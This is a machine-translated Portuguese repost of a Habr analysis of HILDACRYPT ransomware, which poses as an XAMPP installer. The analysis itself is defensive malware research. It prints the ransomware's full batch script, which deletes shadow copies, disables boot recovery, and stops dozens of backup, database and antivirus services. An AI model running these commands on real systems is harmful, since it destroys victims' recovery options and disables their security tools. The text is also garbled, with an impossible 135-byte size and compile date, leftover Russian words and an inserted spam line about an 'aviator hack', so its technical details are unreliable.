Olá, Habr! Mais uma vez, estamos falando das versões mais recentes de malware da categoria Ransomware. HILDACRYPT é um novo ransomware, membro da família Hilda descoberto em agosto de 2019, em homenagem ao desenho animado da Netflix que foi usado para distribuir o software. Hoje estamos nos familiarizando com os recursos técnicos deste vírus ransomware atualizado.
Na primeira versão do Hilda ransomware, um link para um postado no Youtube série de desenhos animados estava contida na carta de resgate. O HILDACRYPT se disfarça como um instalador legítimo do XAMPP, uma distribuição Apache fácil de instalar que inclui MariaDB, PHP e Perl. Ao mesmo tempo, o cryptolocker tem um nome de arquivo diferente - xamp. Além disso, o arquivo ransomware não possui assinatura eletrônica.
Análise estática
O ransomware está contido em um arquivo PE32 .NET escrito para MS Windows. Seu tamanho é 135 bytes. Tanto o código do programa principal quanto o código do programa defensor são escritos em C#. De acordo com a data e hora da compilação, o binário foi criado em 168 de setembro de 14.
De acordo com o Detect It Easy, o ransomware é arquivado usando Confuser e ConfuserEx, mas esses ofuscadores são os mesmos de antes, apenas o ConfuserEx é o sucessor do Confuser, portanto suas assinaturas de código são semelhantes.
O HILDACRYPT é de fato empacotado com o ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vetor de ataque
Muito provavelmente, o ransomware foi descoberto em um dos sites de programação da web, disfarçado como um programa XAMPP legítimo.
Toda a cadeia de infecção pode ser vista em .
Ofuscação
As strings do ransomware são armazenadas de forma criptografada. Quando iniciado, o HILDACRYPT os descriptografa usando Base64 e AES-256-CBC.
Instalação
Em primeiro lugar, o ransomware cria uma pasta em %AppDataRoaming% na qual o parâmetro GUID (Globally Unique Identifier) é gerado aleatoriamente. Ao adicionar um arquivo bat a este local, o vírus ransomware o inicia usando cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat e sair
Em seguida, ele começa a executar um script em lote para desabilitar recursos ou serviços do sistema.
O script contém uma longa lista de comandos que destroem cópias de sombra, desabilitam o servidor SQL, soluções de backup e antivírus.
Por exemplo, tenta sem sucesso parar os serviços de Backup do Acronis. Além disso, ataca sistemas de backup e soluções antivírus dos seguintes fornecedores: Veeam, Sophos, Kaspersky, McAfee e outros.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Depois que os serviços e processos mencionados acima são desabilitados, o cryptolocker coleta informações sobre todos os processos em execução usando o comando tasklist para garantir que todos os serviços necessários estejam inativos.
lista de tarefas v/fo csv
Este comando exibe uma lista detalhada de processos em execução, cujos elementos são separados pelo sinal “,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Após esta verificação, o ransomware inicia o processo de criptografia.
Шифрование
Criptografia de arquivo
O HILDACRYPT percorre todo o conteúdo encontrado nos discos rígidos, exceto as pastas Recycle.Bin e Reference AssembliesMicrosoft. Este último contém arquivos DLL, pdb, etc. críticos para aplicativos .Net que podem afetar a operação do ransomware. Para procurar arquivos que serão criptografados, é usada a seguinte lista de extensões:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
O ransomware usa o algoritmo AES-256-CBC para criptografar os arquivos do usuário. O tamanho da chave é 256 bits e o tamanho do vetor de inicialização (IV) é 16 bytes.
Na captura de tela a seguir, os valores de byte_2 e byte_1 foram obtidos aleatoriamente usando GetBytes().
Ключ
VI
O arquivo criptografado tem a extensão HCY!.. Este é um exemplo de arquivo criptografado. A chave e o IV mencionados acima foram criados para este arquivo.
Criptografia de chave
O cryptolocker armazena a chave AES gerada em um arquivo criptografado. A primeira parte do arquivo criptografado possui um cabeçalho que contém dados como HILDACRYPT, KEY, IV, FileLen em formato XML e tem a seguinte aparência:
A criptografia de chave AES e IV é feita usando RSA-2048 e a codificação é feita usando Base64. A chave pública RSA é armazenada no corpo do cryptolocker em uma das strings criptografadas em formato XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Uma chave pública RSA é usada para criptografar a chave do arquivo AES. A chave pública RSA é codificada em Base64 e consiste em um módulo e um expoente público de 65537. A descriptografia requer a chave privada RSA, que o invasor possui.
Após a criptografia RSA, a chave AES é codificada usando Base64 armazenada no arquivo criptografado.
Mensagem de resgate
Assim que a criptografia for concluída, o HILDACRYPT grava o arquivo html na pasta na qual criptografou os arquivos. A notificação do ransomware contém dois endereços de e-mail onde a vítima pode entrar em contato com o invasor.
O aviso de extorsão também contém a frase “No loli is safe;)” – uma referência a personagens de anime e mangá com aparência de meninas proibidas no Japão.
Jogar aviator online grátis: hack aviator funciona
HILDACRYPT, uma nova família de ransomware, lançou uma nova versão. O modelo de criptografia evita que a vítima descriptografe os arquivos criptografados pelo ransomware. O Cryptolocker usa métodos de proteção ativa para desabilitar serviços de proteção relacionados a sistemas de backup e soluções antivírus. O autor de HILDACRYPT é fã da série animada Hilda exibida na Netflix, cujo link para o trailer constava da carta de rescisão da versão anterior do programa.
Normalmente, и pode proteger seu computador contra o ransomware HILDACRYPT, e os provedores têm a capacidade de proteger seus clientes com . A protecção é garantida pelo facto de estas soluções incluírem inclui não apenas backup, mas também nosso sistema de segurança integrado - Alimentado por um modelo de aprendizado de máquina e baseado em heurística comportamental, uma tecnologia capaz de combater a ameaça de ransomware de dia zero como nenhuma outra.
Indicadores de compromisso
Extensão do arquivo HCY!
HILDACRYPTReadMe.html
xamp.exe com uma letra "p" e sem assinatura digital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Fonte: habr.com